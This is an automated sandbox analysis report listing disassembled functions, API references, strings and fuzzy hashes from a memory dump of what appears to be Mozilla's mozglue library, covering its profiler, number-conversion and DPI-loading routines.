Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 7490ed4ce5b2dd597cbb9e3c0d86a28dc4e9ad2be2cbe10e510320920ee9c400
Instruction ID: 7421a5d8388f26f8a1dafd1419e685134b0ef75f3bd4794d00b015c639107283
Opcode Fuzzy Hash: 7490ed4ce5b2dd597cbb9e3c0d86a28dc4e9ad2be2cbe10e510320920ee9c400
Instruction Fuzzy Hash: 65F1C071A18B418FC756CF39C85462BB7F5AFE6284F058B2EFC46A7690DB31D442CA81

Function 6C2C7030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C2C7046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C2C7060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2C707E

Part of subcall function 6C2781B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C2781DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2C7096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2C709C
LocalFree.KERNEL32(?), ref: 6C2C70AA

Strings

(null), xrefs: 6C2C706A, 6C2C7083
### ERROR: %s: %s, xrefs: 6C2C7087

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 7dca7a80d3829807e837bdb518672f0106bdedd19a62db1ba2e14cb05d6e9fd0
Instruction ID: 4383e8c074525711a52f0264bf56dcd7b26b72085bbc07edbdd87bc91a08ab98
Opcode Fuzzy Hash: 7dca7a80d3829807e837bdb518672f0106bdedd19a62db1ba2e14cb05d6e9fd0
Instruction Fuzzy Hash: ED0196B1A00208ABDB449BA5DC4EDAF7BBCEF4D215F450425FE05B3281DA716914CBA5

Function 6C2B2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C2B2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C2B2C61

Part of subcall function 6C264DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C264E5A
Part of subcall function 6C264DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C264E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2B2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2B2E2D

Part of subcall function 6C2781B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C2781DE

Strings

expected a Time entry, xrefs: 6C2B2E36
(root), xrefs: 6C2B354F
ProfileBuffer parse error: %s, xrefs: 6C2B2E3B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: c0d7247969dd7db79d4587658d09b9f6127009d4262b1cf09a12338b10aca304
Instruction ID: bf6cef2ed59ff64216a2c24cdb3a97af759ed8354cc9a018b9df9e3ac01d017f
Opcode Fuzzy Hash: c0d7247969dd7db79d4587658d09b9f6127009d4262b1cf09a12338b10aca304
Instruction Fuzzy Hash: 9291B0B06087498FD724CF24C49469FB7E0AF89398F50891DED9AAB790DB30E549CB52

Function 6C2C9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C2C9F3D
__aulldiv.LIBCMT ref: 6C2C9F77
__aullrem.LIBCMT ref: 6C2C9F8C
__aulldiv.LIBCMT ref: 6C2CA023

Strings

NaN, xrefs: 6C2C9EAB
-Infinity, xrefs: 6C2C9E60, 6C2C9E7B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 630e34b565384d671ba3cbbcd1b68ddc150e54be7da48f9e7fbef1ae4c4077c3
Instruction ID: a757a9eaa66760c2f223e0950fb5381d1e9767ab3934cc62c0f0112197d1194a
Opcode Fuzzy Hash: 630e34b565384d671ba3cbbcd1b68ddc150e54be7da48f9e7fbef1ae4c4077c3
Instruction Fuzzy Hash: 83C1A031F0031DCBDB14CFADC850B9EB7B6AB84714F544629E805ABB80DB71A949CB92

Function 6C2D545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C2D8A4B

Strings

~q&l, xrefs: 6C2D5740, 6C2D56C7, 6C2D9459, 6C2D9269, 6C2D921F, 6C2D5703, 6C2D948F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memset
String ID: ~q&l
API String ID: 2221118986-2018354307
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 63c3c95ffbedc7d1573c0c35a5fa6eb9d4d3934ac646a91661cb8991131ffcb9
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: B4B1F872E0021E8FDB14CF68CC90BA9B7B6EF95314F1502B9D849DB781D770A995CB90

Function 6C2D542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C2D88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C2D925C

Strings

~q&l, xrefs: 6C2D5740, 6C2D56C7, 6C2D9459, 6C2D9269, 6C2D921F, 6C2D5703, 6C2D948F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memset
String ID: ~q&l
API String ID: 2221118986-2018354307
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: fe9cf0f833cf9ee5d189b49e1a464d758aac34951b3e3fbd3b026605d3c00053
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: F4B1D572E0020A8FCB14CF58CC90AEDB7B6EF94314F15027AD949EB785D770A999CB90

Function 6C2D50C7 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C2D8E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C2D925C

Strings

~q&l, xrefs: 6C2D5740, 6C2D56C7, 6C2D9459, 6C2D9269, 6C2D921F, 6C2D5703, 6C2D948F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memset
String ID: ~q&l
API String ID: 2221118986-2018354307
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: d2a47214e24188af0c89d534d2008a1227764df8d426c94b663a83842fe2ad7e
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: 6BA10772E0011B8FCB14CF68CC90B99B7B6EF94314F1502BAD949EB785D770A999CB90

Function 6C2CB910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C279B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C2CB92D), ref: 6C279BC8
Part of subcall function 6C279B80: __Init_thread_footer.LIBCMT ref: 6C279BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2703D4,?), ref: 6C2CB955
NtQueryVirtualMemory.NTDLL ref: 6C2CB9A5
NtQueryVirtualMemory.NTDLL ref: 6C2CBA20
RtlNtStatusToDosError.NTDLL ref: 6C2CBA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C2CBA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C2CBA86

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 0d333cdd5a3fbce91b696d63a8dbd8abde42f2ea39a0d86bcf15e299e51340b7
Instruction ID: a844e0170274b425ceca83298fc08cc4bfc80a8a95708bd81f34f349dc5d7d0e
Opcode Fuzzy Hash: 0d333cdd5a3fbce91b696d63a8dbd8abde42f2ea39a0d86bcf15e299e51340b7
Instruction Fuzzy Hash: 05514971F0121EDFDF54CEA8D880ADEB7B6AF88314F154229ED01B7B44DA31AD458B92

Function 6C2B77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2B7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2B7A93

Part of subcall function 6C285C50: GetTickCount64.KERNEL32 ref: 6C285D40
Part of subcall function 6C285C50: EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C285D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2B7AA1

Part of subcall function 6C285C50: __aulldiv.LIBCMT ref: 6C285DB4
Part of subcall function 6C285C50: LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C285DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C2B7B31

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 938cff47aa930b47748c9aa626935d7c5f6962e5a79d884a4c0d7fc958dc01af
Instruction ID: fb992b25c2c746907c32d765c420c06ffd324afd85940aee6200896479614299
Opcode Fuzzy Hash: 938cff47aa930b47748c9aa626935d7c5f6962e5a79d884a4c0d7fc958dc01af
Instruction Fuzzy Hash: FAB19A316087898BCB14CE24C45065FB7E2BBC975CF158A1CED9677790DB70E90ACB92

Function 6C2CB700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C2CB720
RtlNtStatusToDosError.NTDLL ref: 6C2CB75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C29FE3F,00000000,00000000,?,?,00000000,?,6C29FE3F), ref: 6C2CB760

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 7495095aac6443a03c6811b5515841a9b2b5c3b97fc93e08f1cf79d6ddd90336
Instruction ID: cb9649660cd32831234db29d2939380b549c09df822ecd22f55effd4033260f7
Opcode Fuzzy Hash: 7495095aac6443a03c6811b5515841a9b2b5c3b97fc93e08f1cf79d6ddd90336
Instruction Fuzzy Hash: 97F022B1E0020DAEEF809AA5CC84BEF73BC9B1831AF101229ED11615C0C778A5DCCE62

Function 6C2CB8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2703D4,?), ref: 6C2CB955
NtQueryVirtualMemory.NTDLL ref: 6C2CB9A5

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: bd0f635b36972e208c3274ee50157a57d92c58dcc2c7eccf3476541ce60ec0f7
Instruction ID: 6ee3d6261ab7bc0834a6a353220d0cc454d8e6aa795ce1dad1b5f08a0785af7e
Opcode Fuzzy Hash: bd0f635b36972e208c3274ee50157a57d92c58dcc2c7eccf3476541ce60ec0f7
Instruction Fuzzy Hash: E6419E71F0121E9FDF04CFA9D894ADEB7B6EF88714F14822AEC05A7744DB31A8458B91

Function 6C2C55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C29E1A5), ref: 6C2C5606
LoadLibraryW.KERNEL32(gdi32,?,6C29E1A5), ref: 6C2C560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C2C5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C2C563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C2C566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C2C567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C2C5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C2C56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C2C56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C2C56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C2C56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C2C5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C2C572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C2C5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C2C5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C2C577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C2C5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C2C57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C2C57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C2C57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C2C57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C2C57FF

Strings

EnableNonClientDpiScaling, xrefs: 6C2C5666
ShowWindow, xrefs: 6C2C56DE
user32, xrefs: 6C2C5601
LoadCursorW, xrefs: 6C2C5774
SetWindowLongPtrW, xrefs: 6C2C57B7
DeleteObject, xrefs: 6C2C57F9
GetSystemMetricsForDpi, xrefs: 6C2C5677
CreateWindowExW, xrefs: 6C2C56C5
SetWindowPos, xrefs: 6C2C56F7
gdi32, xrefs: 6C2C560A
RegisterClassW, xrefs: 6C2C56AC
GetMonitorInfoW, xrefs: 6C2C57A2
GetWindowDC, xrefs: 6C2C5710
StretchDIBits, xrefs: 6C2C57CC
GetDpiForWindow, xrefs: 6C2C5690
FillRect, xrefs: 6C2C5729
AreDpiAwarenessContextsEqual, xrefs: 6C2C5637
MonitorFromWindow, xrefs: 6C2C578D
GetThreadDpiAwarenessContext, xrefs: 6C2C562D
ReleaseDC, xrefs: 6C2C5742
LoadIconW, xrefs: 6C2C575B
CreateSolidBrush, xrefs: 6C2C57E4

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 4527b0aec898026a3d91c00ca56c2bba49cbe4ad4396330e55d7aa32818d2402
Instruction ID: ce999fcd47c44239c8639dd175dd42251342cc6fe438d500fbab6e716367bb38
Opcode Fuzzy Hash: 4527b0aec898026a3d91c00ca56c2bba49cbe4ad4396330e55d7aa32818d2402
Instruction Fuzzy Hash: 35515F7070170B9BEF809F359D4C92B3AB8AB1E2467544639FC21F2A96EB70D840DF65

Function 6C2ACC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C27582D), ref: 6C2ACC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C27582D), ref: 6C2ACC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C2DFE98,?,?,?,?,?,6C27582D), ref: 6C2ACC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C27582D), ref: 6C2ACC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C27582D), ref: 6C2ACC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C27582D), ref: 6C2ACC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C27582D), ref: 6C2ACCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C2ACCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C2ACCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C2ACCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C2ACCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C2ACD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C2ACD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C2ACD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C2ACDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C2ACDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C2ACDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C2ACDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C2ACE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C2ACE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C2ACE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C2ACE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C2ACE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C2ACE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C2ACE8A

Strings

leaf, xrefs: 6C2ACC66
jsallocations, xrefs: 6C2ACD0E
mainthreadio, xrefs: 6C2ACC7C
ipcmessages, xrefs: 6C2ACDBE
default, xrefs: 6C2ACC21
markersallthreads, xrefs: 6C2ACE42
stackwalk, xrefs: 6C2ACCF8
java, xrefs: 6C2ACC37
noiostacks, xrefs: 6C2ACCBE
seqstyle, xrefs: 6C2ACCE6
unregisteredthreads, xrefs: 6C2ACE58
preferencereads, xrefs: 6C2ACD92
Unrecognized feature "%s"., xrefs: 6C2ACEA0
audiocallbacktracing, xrefs: 6C2ACDD4
fileioall, xrefs: 6C2ACCA8
cpuallthreads, xrefs: 6C2ACE16
nostacksampling, xrefs: 6C2ACD7C
power, xrefs: 6C2ACE84
fileio, xrefs: 6C2ACC92
notimerresolutionchange, xrefs: 6C2ACE00
nativeallocations, xrefs: 6C2ACDA8
processcpu, xrefs: 6C2ACE6E
samplingallthreads, xrefs: 6C2ACE2C
screenshots, xrefs: 6C2ACCD4

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 66755d8877e94182d4de53aa3e826e4e4fd519305afd18a96d0f42ceff382413
Instruction ID: c0bbf1feb5b590e0ac798e19b9718df967b404b16f7ddd32126103251550fcae
Opcode Fuzzy Hash: 66755d8877e94182d4de53aa3e826e4e4fd519305afd18a96d0f42ceff382413
Instruction Fuzzy Hash: DB51A6D4905A2E12FA0032D56D10BAB7504EBA7B4BF114036ED4AB5F84FF06B60B85B7

Function 6C2747C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

